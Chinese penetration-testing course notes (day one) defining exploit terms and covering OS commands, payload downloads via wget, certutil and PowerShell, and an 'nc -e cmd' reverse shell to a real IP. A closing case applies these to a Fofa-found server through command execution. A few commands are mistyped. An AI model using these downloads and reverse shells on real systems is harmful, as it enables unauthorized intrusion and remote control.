admin 管理员组文章数量: 887016
#知识点:
1、名词解释-渗透测试-漏洞&攻击&后门&代码&专业词
2、必备技能-操作系统-用途&命令&权限&用户&防火墙
3、必备技能-文件下载-缘由&场景&使用-提权&后渗透
4、必备技能-反弹命令-缘由&场景&使用-提权&后渗透
前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,
反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等
名词解释
POC:全称"Proof of Concept",中文'概念验证',常指一段漏洞证明的代码。
EXP: 全称"Exploit",中文"利用,指利用系统漏洞进行攻击的动作。
Payload:中文"有效载荷",指成功exploit之后,真正在目标系统执行的代码或指令。
Shellcode: 简单翻译"shell代码",是Payload的一种,由于其建立正向/反向shell而得名。
基础案例1:操作系统-用途&命令&权限&用户&防火墙
1.个人计算机&服务器用机:
一般个人计算机大部分为:windows10、windows7.
服务器用机:windows server 2008、2012、2016
Linux: unbutu、centos
2.windows&Linux常见命令
Windows:dir //查看当前目录 ipconfig //查看IP地址
Linux:pwd//查看当前目录 ifconfig//查看IP地址
3.文件权限&服务权限&用户权限
windows:
whoami//查看当前用户的权限
system(系统最高权限)>administrator
Linux:
id//查看当前用户权限
system(系统最高权限) >root
4.自带防火墙出站&入站规则策略协议
windows:
Windows Defender(默认自带的防火墙)
出站的检测很宽容 对入站很严格
Linux:
iptables(默认自带的防火墙)
实用案例1:文件上传下载-解决无图形化&解决数据传输
Linux:
wget http://xxx/shell.exe //去下载文件
curl http://xxx/shell.exe -o shell.exe //下载下来 加-o 是重命名为 不加 默认直接下载下来
Python -m -SimpleHTTPServer 8080 //开放8080端口为http服务器
python3 -m http.server 8080
Windows:
PowerShell: powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe"
CMD: certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe
IPC$: copy \127.0.0.1\c$\ms10-051.exe C:\exploit.exe
实用案例2:反弹Shell命令-解决数据回显&解决数据通讯
useradd 用户名 passwd 用户名
测试Linux系统添加用户或修改密码命令交互回显问题
结合案例1:防火墙绕过-正向连接&反向连接&内网服务器
1、内网:
内网 -> hesy
hesy !-> 内网
2、防火墙:
hesy <->aliyun //正常通讯
hesy防火墙 ->aliyun
aliyun !-> hesy防火墙
nc -e cmd 47.75.121.155 5577 //把当前的cmd权限移交到指定IP
nv -lvvp 5577 /去监听本地5577端口 反弹shell
只能内网的IP主机去反弹shell给外网有IP的服务器,外网IP没办法反弹shell给一台内网的主机.(这就需要流量转发)
正向连接:
攻击者作为客户端去连接目标主机服务器端口。相当于是攻击者主动去找服务器
反向连接:
目标主机作为客户端去主动访问攻击者的端口。相当于目标主机是客户端,攻击者是服务端。
综合案例2:Fofa拿下同行Pikachu服务器
文件&反弹shell:
主要利用点在于命令执行这个漏洞,通过命令执行,让目标去下载外网上我们的nc.exe 然后通过 nc -e cmd IP 8888 主动去连接我们的端口。获得目标主机的shell(对于出站的流量,防火墙一般都很宽松)
版权声明:本文标题:day01 操作系统&文件下载&反弹shell&防火墙绕过 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1729169607h1326484.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论